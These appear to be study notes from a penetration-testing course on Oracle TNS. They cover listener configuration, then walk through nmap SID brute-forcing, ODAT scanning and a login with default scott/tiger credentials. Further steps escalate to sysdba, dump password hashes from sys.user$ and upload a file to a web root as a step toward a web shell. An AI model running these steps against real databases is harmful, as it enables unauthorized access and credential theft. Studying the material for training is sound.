Oracle TNS

Oracle TNS: Oracle Transparent Network Substrate

  • A protocol that facilitates comm bet Oracle DB's/apps over networks

  • TNS supports various protocols bet client apps, such as IPX/SPX and TCP/IP protocol stacks

    • It has become a solution for large, complex db's healthcare, finance, and retail industries

    • Its built-in encryption mechanism ensures the sec of data transmitted

      • Ideal solution for enterprise envs where data sec is paramount

      • TNS now has support IPv6/SSL/TLS encryption which makes suitable for the following:

        • Name resolution, Connection management, Load balancing, Security Default Config

  • Default: The listener listens for incoming connections on port 1521

  • The TNS listener is config to support TCP/IP, UDP, IPX/SPX, and AppleTalk

  • Can support multiple network ints and listen on specific IP's

  • Default: Can be remotely managed in Oracle 8i/9i but not in 10g/11g

Oracle db's can be protected by using PlsqlExclusionList: PL/SQL Exclusion List

  • User-created txt file that needs to be placed in $ORACLE_HOME/sqldeveloper dir

  • Contains the names of PL/SQL packages/types that should be excluded from exec

  • Once PL/SQL Exclusion List is created: It can be loaded into the db instance

    • It serves as a blacklist that can't be accessed through the Oracle App Server

connect_data # attributes of connection, service name, sid, protocol, db instance id
instance_name # name of db instance client
service_name # name of service client wants to connect to 
security # security type for connections
connect_timeout # time limit in seconds for client to establish a connection to db
receive_timeout # time limit in seconds for client to receive a response from db
send_timeout # time limit in seconds for client to send request to db
sqlnet.expire_time # time limit in seconds for client to detect connection failed
trace_level # tracing for db connection
trace_directory # dir where trace files stored
trace_file_name # name of trace file
log_file # log info

Before we can enumerate the TNS listener and interact with it, we need to download a few packages and tools for our Pwnbox instance in case it does not have these already.


sudo apt-get install libaio1 python3-dev alien -y 
git clone 
git submodule init git submodule update 

export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH 

pip3 install cx_Oracle 
sudo apt-get install python3-scapy -y 
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap 
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

./ -h
usage: [-h] [--version]
            _  __   _  ___ 
           / \|  \ / \|_ _|
          ( o ) o ) o || | 
  _        __           _           ___ 
 / \      |  \         / \         |_ _|
( o )       o )         o |         | | 
 \_/racle |__/atabase |_n_|ttacking |_|ool 

ODAT: Oracle DB Attacking Tool:

  • Open-source pentesting tool written in Python/designed to enum/exploit vulns

  • Can be used to id, exploit, including SQLi, RCE, and privesc

sudo nmap -p1521 -sV --open
1521/tcp open  oracle-tns Oracle TNS listener (unauthorized)
  • In Oracle RDBMS, a SID: System Id is a unique name that id's a particular db instance

  • It can have multiple instances, each with its own SID

  • Instance: A set of procs/mem structures that interact to manage the db's data

  • When a client connects to an Oracle db, it specifies the SID, with its connection str

  • The client uses this SID to id which db instance it wants to connect to

  • If not specified: The default value defined in the tnsnames.ora file is used

The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to. If the client specifies an incorrect SID, the connection attempt will fail. Database administrators can use the SID to monitor and manage the individual instances of a database. For example, they can start, stop, or restart an instance, adjust its memory allocation or other configuration parameters, and monitor its performance using tools like Oracle Enterprise Manager.

There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like nmap, hydra, odat, and others. Let us use nmap first.

Nmap - SID Bruteforcing

sudo nmap -p1521 -sV --open --script oracle-sid-brute
1521/tcp open  oracle-tns Oracle TNS listener (unauthorized)
| oracle-sid-brute: 
|_  XE
  • We can use to perform a variety of scans to for info about Oracle db services/components

  • Scans can retrieve db names, ver, running procs, user accts, vulns, misconfigs, etc. ODAT

./ all -s
  • In this example, we found valid creds for scott and his password tiger

  • Now we can use the tool sqlplus to connect to the Oracle db/interact with it SQLplus - Log In

sqlplus scott/tiger@

SQL*Plus: Release - Production on Mon Mar 6 11:19:21 2023 
Copyright (c) 1982, 2021, Oracle. All rights reserved.
  • If you come across the following error: sqlplus: error while loading shared libraries: cannot open shared object file: No such file or directory, please exec below, taken from here

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/";sudo ldconfig
  • Many SQLplus cmds that we can use to enum the db manually

  • We can list all available tables in the current db/show us privs of the current user: Oracle RDBMS - Interaction

SQL> select table_name from all_tables;


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO
  • scott has no admin privs

  • We can try using this acct to log in as Sys Db Admin (sysdba), giving us higher privs Oracle RDBMS - Db Enum

sqlplus scott/tiger@ as sysdba
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
SQL> select name, password from sys.user$;
# we can retrieve password hashes from sys.user$ and try to crack them offline 
  • Another option is to upload a web shell to target Default Paths:

    • Linux: /var/www/html|| Windows: C:\inetpub\wwwroot

# oracle RDBMS - file upload 
echo "oracle file upload test" > testing.txt
./ utlfile -s -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
  • We can test if the file upload worked with curl

  • We will use a GET http://<IP> request, or we can visit via browser

curl -X GET # oracle file UL test

Last updated